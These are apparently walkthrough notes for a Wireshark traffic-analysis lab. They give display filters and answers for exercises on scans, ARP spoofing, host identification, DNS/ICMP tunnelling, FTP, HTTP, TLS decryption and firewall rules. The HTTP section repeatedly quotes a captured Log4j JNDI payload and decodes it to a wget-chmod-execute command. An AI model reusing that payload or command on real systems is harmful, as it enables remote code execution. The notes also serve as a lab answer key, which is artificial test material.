WIRESHARK: TRAFFIC ANALYSIS
NMAP SCANS
Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. What is the total number of the "TCP Connect" scans?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size > 1024
WireShark > status bar
* Packets: 6544 Displayed: 1000 (15.3%)Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which scan type is used to scan the TCP port 80?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: tcp.port==80
SYN, SYN/ACK, ACK
* sort the packet list window by "time" in ascending orderUse the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. How many "UDP close port" messages are there?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: ticmp.type==3 and icmp.code==3
WireShark > status bar
* Packets: 6544 Displayed: 1083 (16.5%)Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which UDP port in the 55-70 port range is open?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: (udp.dstport >= 55 && udp.dstport <=70) && !(icmp.code == 3)
Output: 67 Destination Unreachable/Port Unreachable
Output: 69 Destination Unreachable/Port Unreachable
Output: 68
- must sort the "info" column IOT see that 67 & 69 were unreachableARP POISONING & MITM
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of ARP requests crafted by the attacker?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: arp.opcode == 1 && eth.src == 00:0c:29:e2:18:b4
WireShark > status bar
* Packets: 2866 Displayed: 284 (9.9%)Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of HTTP packets received by the attacker?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: http && eth.dst == 00:0c:29:e2:18:b4
WireShark > status bar
* Packets: 2866 Displayed: 90 (3.1%)Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of sniffed username&password entries?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: ((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")
WireShark > status bar
* Packets: 2866 Displayed: 6 (0.2%)
* find the specific key/value (uname) in packet details then select
"apply as filter" "...and selected"Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the password of the "Client986"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: (((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")) && (urlencoded-form.value == "client986")
CTRL+F:
Packet: Packet Details
Type: Narrow & Wide
Case sensitive: disabled
Search Type: String
Search: Client354
* clientnothere!
* find the specific key/value (client986) in packet details then select
"apply as filter" "...and selected"Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the comment provided by the "Client354"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng
#step 1: get an overview
WireShark
Filter: ((http && eth.dst == 00:0c:29:e2:18:b4))
CTRL+F:
Packet: Packet Details
Type: Narrow & Wide
Case sensitive: disabled
Search Type: String
Search: Client354
* Nice Work!IDENTIFYING HOSTS | DHCP, NETBIOS & KERBEROS
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. What is the MAC address of the host "Galaxy A30"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
#step 1: get an overview
WireShark
Filter: dhcp
Packet Details > DHCP > Option: (12) Host Name
...
#step 2: expand the filter
Filter: lower(dhcp.option.hostname) contains "a30"
...
Packet Details > DHCP > Option: (61) Client Identifier
Client MAC Addres > Copy > Value
9a:81:41:cb:96:6cUse the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. How many NetBIOS registration requests does the "LIVALJM" workstation have?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
WireShark > Analyze > Display Filter Expression
Search: nbns
Field Name: NBNS > nbns.name
Relation: contains
Value: n/a
Filter: nbns.name contains "ALJM"
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > NBNS > Flags > right-click ... = Opcode: Registration (5) > Apply as Filter > ...And Selected
Filter: (nbns.name contains "ALJM") && (nbns.flags.opcode == 5)
* Packets: 1800000 Displayed: 16 (0.0%)Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. Which host requested the IP address "172.16.13.85"?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap
WireShark > Analyze > Display Filter Expression
Search: requested
Field Name: DHCP/BOOTP > dhcp.option.requested_ip_address
Relation: ==
Value: 172.16.13.85
Filter: dhcp.option.requested_ip_address == 172.16.13.85
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > DHCP > DHCP (Request) > right-click option (12) > right-click Host Name > Copy > Value
Galaxy-A12Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the IP address of the user "u5"? (Enter the address in defanged format.)
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap
WireShark > Analyze > Display Filter Expression
Search: cnamestring
Field Name: KRB5 > kerberos.CNameString
Relation: contains
Value: u5
Filter: kerberos.CNameString contains "u5"
* revise and improve the original filter
WireShark > Packet List > packet > Packet Details > Kerberos > req-body > cname > cname-string > u5
* this verifies that you are identifying the correct packet
WireShark > Packet Details > IPv4 > Src > Copy > Value
Internet Protocol Version 4, Src: 10.1.12.2, Dst: 10.5.3.1Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the hostname of the available host in the Kerberos packets?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap
WireShark > Analyze > Display Filter Expression
Search: cnamestring
Field Name: KRB5 > kerberos.CNameString
Relation: contains
Value: $
Filter: kerberos.CNameString contains "$"
* Some packets could provide hostname information in this field. To avoid
this confusion, filter the "$" value. The values end with "$" are
hostnames, and the ones without it are user names.
WireShark > Packet List > packet > Packet Details > Kerberos > tgs-rep > cname > right-click cname-string > Copy > Value
xp1$TUNNELING TRAFFIC: DNS & ICMP
Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file. Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap
#step 1: get an overview
WireShark
Filter: icmp
#anomalous
WireShark > icmp && data.len > 64
* normal ICMP packet are 64-bytes in size. anything more than this number could be
a sign of tunneling
Wireshark
Filter: icmp && data.len > 64 and (icmp contains "ssh" or icmp contains "ftp" or icmp contains "tcp" or icmp contains "http")
45000304398640004006e7ad0a5f01020a5f01010016c88b0e1bc373317d578a80180228876f00000101080a006d8653006d6af2000002bc0a2100000115000000077373682d72736100000001230000010100aaf6ef3e7b35837e944717e968fc75b0d4d3447d6602036873dfd40002ab9c668b5b0fde9f8f01b4924ab077bd82a921640990e730e2f8f989e26809b9a8b141825a6c6c92fc3d9c317693148df73b2936b77d4a200ba5cf7acb94bbc042ed544cb761bd44c973d6315f83f6363cb7661f4abe83b464d61d75a891ab105a070848d946456e6e1a5c92b7e1341a0f60c108e7c8f15c2260b6319050fbc6e823cf184f4d8d07827195fa3bcfea14d2db583b9d54cd9dfdd24cfe2c6a42fe8857e3af2270fd04ddbd4f547782e5d6fd95432499e22801a93dfb4a56ab6599abeff08223a72624ceb8f87390b18f91e05bcacbbd3dd9fef5532e3d16573f12b73e91000000800f4b0e4dea70b6aa5c38f7e15fe1fefb55a044289798edd4d5b85dd9808c80b1127e5e9228f59a716357d8bdc5e5aba2553be94592a555ce0d5367e13b7e8aa8a413bca1e66244d701ce32922346850f60ea3dc616e556a5f61e725f94a4d16053063775bc881783de5a433a39aa4bb035f6535f558bc4f18c8ee01f2b53a7d10000010f000000077373682d7273610000010081e7654135bbb3925d206bdd74347f14be34a598a7cd61bcced3eace8363110990e6d8f17488956366501e84fac68dccdd962a7056227fe432e40c43a3d283da0d1ee139d85c6081beb9760978cc75ac37f7f1e4f1994941f5e19bdff2fac585c00b9342d7cabf570cab12a78cf4ad332244ea9ae3fdb92c577d6f7b3fd006e622b56651647a81d3446ad489b847235f75767b876d94a3e854212d5605c9a477f234139145d2bf33e86143fc593706da9e97d1367711f665a87f98d83d089dd7e898d51cbbd941c248f8dda99cf19a06e5f7e9dbdd7f125aa427f2ce992f8062d036e0c9fb36180e92ee5f1da70ff60e972b23cba6812419b0ef92d5a74fd6fc000000000000000000000000000c0a1500000000000000000000
* include protocol commonly used in data exfiltration "ssh", "ftp", "tcp", "http"
- when the hexadecimal output is converted to ascii, "ssh-rsa" will be shown Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file. Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/dns.pcap
#step 1: get an overview
WireShark
Filter: dns
#anomalous
WireShark
Filter: dns.qry.name.len > 15 and !mdns
* this detects DNS queries with a name length greater than 15 characters, e
xcluding multicast DNS (mDNS).
#pin-point
WireShark > Packet list > Packet Details > DNS > Queries > ... > right-click Name > Apply as Filter > ...And not selected
((((dns.qry.name.len > 15 and !mdns) && !(dns.qry.name == "v10.events.data.microsoft.com")) && !(dns.qry.name == "connectivity-check.ubuntu.com")) && !(dns.qry.name == "131.94.168.192.in-addr.arpa")) && !(dns.qry.name == "8.8.8.8.in-addr.arpa")
A8D603B0DE000000009AF29E902AB216780EAFD10AA3E4A376A2D9165E7809E.2030742EDA1B513BF68DFD675E855A2AA61B2BCE0A7889811D12B34806B9A18.441119E94628EA35FFF9.dataexfil.com
* keep filtering out non pertinent query namesCLEARTEXT PROTOCOL ANALYSIS: FTP
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. How many incorrect login attempts are there?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#anomalous
WireShark
Filter: ftp.response.code == 530
WireShark > status bar
* Packets: 20448 Displayed: 737 (3.6%)Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. What is the size of the file accessed by the "ftp" account?
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#anomalous
WireShark
Filter: ftp.response.code == 213
WireShark > Packet list > Packet bytes > FTP > 213 > Response Args: 39424Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary uploaded a document to the FTP server. What is the filename?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"
WireShark > Packet List > Packet Details > FTP > RETR > Request Arg > Copy > Value
* resume.docUse the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap
#step 1: get an overview
WireShark
Filter: ftp
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"
WireShark > Packet List > right-click packet > Follow > TCP Stream
...
PWD
257 "/" is current directory.
TYPE A
200 Type set to A
EPSV
229 Entering Extended Passive Mode (|||35656|)
LIST
150 Opening ASCII mode data connection for file list
226 Transfer complete.
SITE CHMOD 777 resume.doc
550 resume.doc: Permission denied
QUIT
221 Goodbye.CLEARTEXT PROTOCOL ANALYSIS: HTTP
Use the "Desktop/exercise-pcaps/http/user-agent.cap" file. Investigate the user agents. What is the number of anomalous "user-agent" types?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap
#step 1: get an overview
WireShark
Filter: http.user_agent
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Wfuzz/2.4
sqlmap/1.4#stable (http://sqlmap.org)
Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
- Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
* count each unique potentially malicious user-agents manually
- there are six unique user-agents that are anomalous, but one of them is
a modified user-agent which is Windows NT 6.4; this specific user-agent
have six occurrences
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsersUse the "Desktop/exercise-pcaps/http/user-agent.cap" file. What is the packet number with a subtle spelling difference in the user agent field?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap
#step 1: get an overview
WireShark
Filter: http.user_agent
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Wfuzz/2.4
sqlmap/1.4#stable (http://sqlmap.org)
Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
- Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
- 52 -1063550943.144639779 10.10.57.178 44.228.249.3 HTTP 469 Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 GET /categories.php HTTP/1.1
* count each unique potentially malicious user-agents manually
- there are six unique user-agents that are anomalous, but one of them is
a modified user-agent which is Windows NT 6.4; this specific user-agent
have six occurrences
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsersUse the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase. What is the packet number?
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains $
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsersUse the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains $
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
root@dco:~$ cyberchef.io
input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
recipe: From Base64
recipe: Defang IP Addresses
output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsersENCRYPTED PROTOCOL ANALYSIS: DECRYPTING HTTPS
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. What is the frame number of the "Client Hello" message sent to "accounts.google.com"?
root@dco:~$ wireshark &
#step 1: get an overview
WireShark
Filter: (http.request or tls.handshake.type == 1) and !(ssdp) && tls.handshake.extensions_server_name
* the tls.handshake.extensions_server_name filter will limit the output data to only those packets that have SNI field
#step 2:
WireShark > Packet list > Packet Details > TLS > TLSvX.X Record Layer > Handshake Protocol > Extension: server_name > Server Name Indication Extension > right-click "Server Name: ..." > Apply as Column
16 0.755456 192.168.1.12 172.217.17.237 TLSv1.3 571 accounts.google.com Client Hello
* visually scan potential malicious domains from the packet list Server Name ColumnUse the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
#step 1: get an overview
WireShark
Filter: http2
* Packets: 1760 Displayed: 115 (6.5%)Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
Wireshark > Go > Go to Packet
Packet No. 322
Wireshark > Packet List > Packet Details > HTTP2 > Header: :Authority
safebrowsing[.]googleapis[.]comUse the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Investigate the decrypted packets and find the flag! What is the flag?
root@dco:~$ wireshark &
WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
(Pre)-Master-Secret log filename: KeyLogFile.txt
* all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
Wireshark > File > Export Objects > HTTP
1644 situla.bitbit.net text/plain 3412 bytes 21e2ae0fb85fde7bb246ed90194f601e041b3c8...
* Save & open the file for the flag
- FLAG{THM-PACKETMASTER} BONUS: HUNTING CLEARTEXT CREDENTIALS
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number of the credentials using "HTTP Basic Auth"?
root@dco:~$ wireshark &
WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
Packet No. Protocol Username Additional Info
237 HTTP Basic Auth afiiskcUse the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number where "empty password" was submitted?
root@dco:~$ wireshark &
WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
Packet No. Protocol Username Additional Info
170 FTP Administrator Username in packet 136BONUS: ACTIONABLE RESULTS!
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?
root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}
WireShark > Go > Go to Packet
Packet No: 99
WireShark > Tools > Firewall ACL Rules
Create Rule For: IPFirewall (ipfw)
Inbound: enabled
Deny: enabled
add deny ip from 10.121.70.151 to any inUse the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?
root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}
WireShark > Go > Go to Packet
Packet No: 231
WireShark > Tools > Firewall ACL Rules
Create Rule For: IPFirewall (ipfw)
Inbound: enabled
Deny: disabled
add allow MAC 00:d0:59:aa:af:80 any inLast updated